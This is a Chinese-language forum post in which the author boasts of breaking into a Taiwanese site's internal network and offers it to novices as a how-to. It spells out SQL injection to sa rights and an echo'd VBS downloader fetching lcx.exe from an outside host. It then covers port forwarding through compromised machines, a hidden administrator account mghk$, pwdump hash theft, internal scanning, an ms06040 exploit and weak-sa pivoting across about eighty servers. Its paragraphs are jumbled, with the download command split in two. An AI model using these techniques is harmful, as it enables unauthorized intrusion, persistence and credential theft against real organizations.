內網滲透對于大型網絡入侵非常重要， 但我們要懂得一些基本的網絡結構， 防火墻的設置， 如果面的DMZ的配置情況， 需要掌握端口轉發、信息收集、社會工程學的利用、密碼破解等， 這是我今天上午拿下一網站內網服務器的經歷， 沒什么技術含量， 寫出來和菜鳥http://www.ncph.net/lcx.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"c:\c.exe^",2 >down.vbs

  接著執行cscrīpt down.vbs 還好， 下載lcx.exe成功， 位置為c:\c.exe

  先來執行個端口轉發看看， 我知道他們的服務器都放在一個防火墻后面， 但雖然外面不能訪問里面， 里面可以訪問外面就好說了。

  繼續在nbsi里面執行：c:\c.exe -slave xxx.xxx.xx.xx 51 172.26.1.248 3389

在我的另一臺3389肉機監聽:c:\lcx.exe -listen 51 4489 ,因為我上網是adsl拔號上網， ip會變的， 所以我干脆轉發到我的3389肉機上面， 一是安全， 二是速度快， 三是可以讓它一直轉發到上面。 因為我3389肉機的3389端口已開放， 所以我就轉到4489上面了， 然后用3389登錄127.0.0.1:4489。

  對了， 還忘了建帳號， 趕緊刷新nbsi建個隱藏帳號mghk$， 這時c.exe 的進程并沒有結束， 所以轉發仍沒有斷開， 用建好的帳號直接進入.如圖:

朋友們分享一下。

  情況的起因：這幾天沒什么好玩的就去玩玩國外網站， 國內的不敢玩了。 。 。 。 。 。 。 。 。

轉去轉來盯上一個中國臺灣省的一個大站， 有二十幾個二級域名的分站點， 這下好玩了。 來點耐心， 一個一個的分站去檢測一下， 一圈下來居然沒收獲， 不是說站點越大入侵的機率越大嘛。 于是再挑兩個asp的站點看看， 在一個不起眼的地方檢測了一下搜索型注入， 結果在搜索框里沒過濾， 便構造了一個注入點用nbsi跑起來。

不負眾望， 居然是一個sa權限的， 接下來打算寫一個webshell上去， 才發現是數據庫與web分離的， 再看一下開放的端口， 80、21、1433、3389都開開的， 再看一下ip， 是內網的， netstat -an看一下， 所有的連接都是另一個內網ip,應該是其它服務器內網連接到這臺數據庫服務器上的,這只是一個小小的數據庫服務器。

  再在本機的cmd下通過網站ip telnet一下上面的端口， 不通， 看來我是被困死在這臺數據庫服務器上面了， 呆然開了3389是登不上的， 相信很多人都遇到這種情況過。

于是我便在nbsi執行命令處下寫了一段vbs下載腳本上去：

echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"

進去的第一件事當然是隱藏帳號了， 以前按照網上的做法總是在用戶管理里面看得到mghk$這個用戶， 玩久了也就知道怎么做最好了， 在導出兩個注冊表后， 并不用net user mghk$ /del來刪除， 以前木木告訴我這樣刪除， 后來我是直接在用戶管理里面刪除， 再導入注冊表， 再net localgroup administrators mghk$ 加入管理組， 這里候我們去用戶表里和用戶管理里面都看不到， 除非管理員用net localgroup administrators才可以看到， 不過這幾個字母打下來手都痛了， 所以沒幾個管理員這樣查看的， 以至于我的幾臺3389肉機用了大半年了還安然無恙， 當然是高速極品肉機哦。

第二件事就向他的內網進軍， 我想到的是立即要做三件事， 一是獲得管理員密碼， 如果管理員在線， 可以用findpass抓一下， 因為這臺是windows2000的， 也可以用pwdump抓密碼哈希再用lc5在本機破解。 二是安裝嗅探， 用cain比較好， 因為我們現在上的是3389， 三是上傳一個掃描軟件， 內網掃描它網段的內網ip， 因為內網掃描我們就已繞過防火墻了,可以得到很多有用信息。

密碼沒用findpass到， 用pwdump抓了個哈希下來用一臺肉機開著lc5跑密碼， 裝了個cain， 可win2000需要重啟， 這里就不重啟了， 以免打草驚蛇。

我傳了個hscan上去， 自己構造了一下字典， 然后掃描172.16.1.1-172.16.1.255網段。 還傳了個ms06040上去， 準備內網溢出。 掃描一會得到結果， 有不少開139， 445的， 還空連接成功， 更令人興備的是掃出來一個1433弱口令， 還是sa的， 當然這些在外網是掃不出來的， 因為防火墻屏蔽了所有的外網連接， 就只有主站通過80端口連出來的。

如圖看結果：

我再傳了一個sql.exe上去， 準備連接mssql用戶名和密碼為sa的ip,執行命令， 還好， 它還開了3389， 當我們真正進入到內網進行操作的時候才發現比平時從外網入侵容易多了。

直接執行命令， 如圖：

進去后再次登上另一臺的3389， 這臺上面已經有部分網站了， 再次抓了這臺機器的哈希， 發現哈希一至， 所以應該他們所有的服務器密碼都是一至， 只等我掛在肉機上的哈希密碼跑出來就ok了， 一般三天時間就跑出來， 這樣就可以宣布徹底搞定這個網站的所有服務器， 大至登了一下， 有八十幾臺服務器， 臺灣人真有錢。